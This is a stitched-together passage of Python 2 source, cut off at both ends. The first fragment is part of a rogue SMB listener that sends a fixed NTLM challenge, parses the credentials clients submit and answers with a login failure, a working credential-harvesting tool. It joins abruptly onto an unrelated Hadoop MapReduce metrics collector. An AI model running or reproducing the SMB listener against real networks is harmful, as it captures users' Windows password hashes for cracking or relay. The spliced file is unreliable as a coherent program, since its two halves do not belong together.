"\x04\xff\x00\xdd\x00\x00\x00\x68\x00\xb2\x00" payload += "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00" payload += "\x00\x04\x00\x04\x00\x38\x00\x00\x00\x15\x82" payload += "\x8a\xe2\x11\x22\x33\x44\x55\x66\x77\x88\x00" #ntlm challenge 1122334455667788 payload += "\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x2c\x00" payload += "\x3c\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00" payload += "\x0f\x4e\x00\x4f\x00\x02\x00\x04\x00\x4e\x00" payload += "\x4f\x00\x01\x00\x04\x00\x4e\x00\x4f\x00\x04" payload += "\x00\x04\x00\x6e\x00\x6f\x00\x03\x00\x04\x00" payload += "\x6e\x00\x6f\x00\x06\x00\x04\x00\x01\x00\x00" payload += "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e" payload += "\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00" payload += "\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69" payload += "\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00" payload += "\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20" payload +=
"\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00" payload += "\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72" payload += "\x00\x00" return (payload, 0
) elif message_type == '0x3': # should be an AUTH packet # parse credentials self.parse_credentials(data) # send a STATUS_LOGIN_FAILURE # netbios payload = "\x00\x00\x00\x23" # smb header payload += "\xff\x53\x4d\x42\x73\x6d\x00\x00\xc0\x98\x07" payload += "\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" payload += "\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00" # session setup andx response, status_login_failure payload += "\x00\x00\x00" return (payload, 1) else: return (None, 1) # dbg -- dump the packet def dbg_dump(self, data): cnt = 0 for i in data: sys.stdout.write(str(hex(ord(i))) + ' ') cnt += 1 if cnt % 16 == 0: print '' cnt = 0 print '' # handle packets def handler(self, con, data): try: if len(data) > 4: data = data[4:] (payload, err) = self.get_payload(data) if not payload is None and err is 0: con.send(payload) elif not payload is None and err is 1: con.send(payload) return False else: return False except Exception, j: util.Error('SMB error: %s' % j) return False return True # threaded init def initialize_bg(self): util.Msg('Starting SMB listener...') thread = Thread(target=self.initialize) thread.start() return True # initialize SMB listener def initialize(self): socker = socket.socket(socket.AF_INET, socket.SOCK_STREAM) socker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) socker.settimeout(3) socker.bind(('', self.config['port'].value)) socker.listen(5) self.running = True try: while self.running: try: con, addr = socker.accept() except KeyboardInterrupt: break except: continue self.log_msg('Connection from %s' % addr[0]) while self.running: data = con.recv(256) if not self.handler(con, data): break con.shutdown(socket.SHUT_RDWR) con.close() self.log_msg('Closed connection with %s.\n' % addr[0]) except KeyboardInterrupt: self.running = False except socket.error: pass except Exception, j: util.Error('Error with SMB listener: %s' % j) self.running = Fa
"reducesPending": 1, # "reducesRunning": 0, # "uberized": false, # "diagnostics": "", # "newReduceAttempts": 1, # "runningReduceAttempts": 0, # "failedReduceAttempts": 0, # "killedReduceAttempts": 0, # "successfulReduceAttempts": 0, # "newMapAttempts": 0, # "runningMapAttempts": 1, # "failedMapAttempts": 1, # "killedMapAttempts": 0, # "successfulMapAttempts": 0 # } # ] # } # } JOB = ['elapsedTime', 'mapsTotal', 'mapsCompleted', 'reducesTotal', 'reducesCompleted', 'mapsPending', 'mapsRunning', 'reducesPending', 'reducesRunning', 'newReduceAttempts', 'runningReduceAttempts', 'failedReduceAttempts', 'killedReduceAttempts', 'successfulReduceAttempts', 'newMapAttempts', 'runningMapAttempts', 'failedMapAttempts', 'killedMapAttempts', 'successfulMapAttempts'] # form 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/counters' # { # "jobCounters": { # "id": "job_1453738555560_0001", # "counterGroup": [ # { # "counterGroupName": "org.apache.hadoop.mapreduce.FileSystemCounter", # "counter": [ # { # "name": "FILE_BYTES_READ", # "totalCounterValue": 0, # "mapCounterValue": 1, # "reduceCounterValue": 2 # }, # { # "name": "FILE_BYTES_WRITTEN", # "totalCounterValue": 3, # "mapCounterValue": 4, # "reduceCounterValue": 5 # } # ] # } # ] # } # } JOB_COUNTER = ['reduceCounterValue', 'mapCounterValue', 'totalCounterValue'] # form 'http://localhost:8088/proxy/application_1453738555560_0001/ws/v1/mapreduce/jobs/application_1453738555560_0001/tasks' # { # "tasks": { # "task": [ # { # "startTime": 1453761318527, # "finishTime": 0, # "elapsedTime": 99869037, # "progress": 49.11076, # "id": "task_1453738555560_0001_m_000000", # "state": "RUNNING", # "type": "MAP", # "successfulAttempt": "", # "status": "map > map" # } # ] # } # } class MapReduce(CollectorBase): def __init__(self, config, logger, readq): super(MapReduce, self).__init__(config, logger, readq) self.port = self.get_config('port', 8080) self.host = self.get_config('host', "localhost") self.http_prefix = 'http://%s:%s' % (self.host, self.port) def __call__(self): try: running_apps = self._get_running_app_ids() running_jobs = self._mapreduce_job_metrics(running_apps) self._mapreduce_job_counters_metrics(running_jobs) self._mapreduce_task_metrics(running_jobs) self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '0')) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception collecting mapreduce metrics %s' % e) def _get_running_app_ids(self): try: running_apps = {} metrics_json = self.request("/%s?%s" % (REST_API['YARN_APPS_PATH'], "states=RUNNING&applicationTypes=MAPREDUCE")) if metrics_json.get('apps'): if metrics_json['apps'].get('app') is not None: for app_json in metrics_json['apps']['app']: app_id = app_json.get('id') tracking_url = app_json.get('trackingUrl') app_name = app_json.get('name') if app_id and tracking_url and app_name: running_apps[app_id] = (app_name, tracking_url) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception collecting yarn apps metric for mapreduce \n %s',e) return running_apps def _mapreduce_job_metrics(self, running_apps): ''' Get metrics for e
ach MapReduce job. Return a dictionary for each MapReduce job { job_id: { 'job_name': job_name, 'app_name': app_name, 'user_
name': user_name, 'tracking_url': tracking_url } ''' try: running_jobs = {} for app_id, (app_name, tracking_url) in running_apps.iteritems(): ts = time.time() metrics_json = self.request_url("%s%s" % (tracking_url,REST_API['MAPREDUCE_JOBS_PATH'])) if metrics_json.get('jobs'): if metrics_json['jobs'].get('job'): for job_json in metrics_json['jobs']['job']: job_id = job_json.get('id') job_name = job_json.get('name') user_name = job_json.get('user') if job_id and job_name and user_name: # Build the structure to hold the information for each job ID running_jobs[str(job_id)] = {'job_name': str(job_name), 'app_name': str(app_name), 'user_name': str(user_name), 'tracking_url': "%s%s/%s" % (tracking_url, REST_API['MAPREDUCE_JOBS_PATH'], job_id)} for metric in JOB: self._readq.nput('mapreduce.job.%s %d %d app_name=%s user_name=%s job_name=%s' % (metric, ts, job_json[metric], utils.remove_invalid_characters(str(app_name)), utils.remove_invalid_characters(str(user_name)), utils.remove_invalid_characters(str(job_name)))) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception collecting mapreduce jobs metric \n %s',e) return running_jobs def _mapreduce_job_counters_metrics(self, running_jobs): ''' Get custom metrics specified for each counter ''' try: for job_id, job_metrics in running_jobs.iteritems(): ts = time.time() job_name = job_metrics['job_name'] if job_name: metrics_json = self.request_url("%s%s" % (job_metrics['tracking_url'],'/counters')) if metrics_json.get('jobCounters'): if metrics_json['jobCounters'].get('counterGroup'): for counter_group in metrics_json['jobCounters']['counterGroup']: group_name = counter_group.get('counterGroupName') if group_name: if counter_group.get('counter'): for counter in counter_group['counter']: counter_name = counter.get('name') for metric in JOB_COUNTER: self._readq.nput('mapreduce.job.counter.%s %d %d app_name=%s user_name=%s job_name=%s counter_name=%s' % (metric, ts, counter[metric], utils.remove_invalid_characters(job_metrics.get('app_name')), utils.remove_invalid_characters(job_metrics.get('user_name')), utils.remove_invalid_characters(job_name), utils.remove_invalid_characters(str(counter_name).lower()))) except Exception as e: self._readq.nput("mapreduce.state %s %s" % (int(time.time()), '1')) self.log_exception('exception co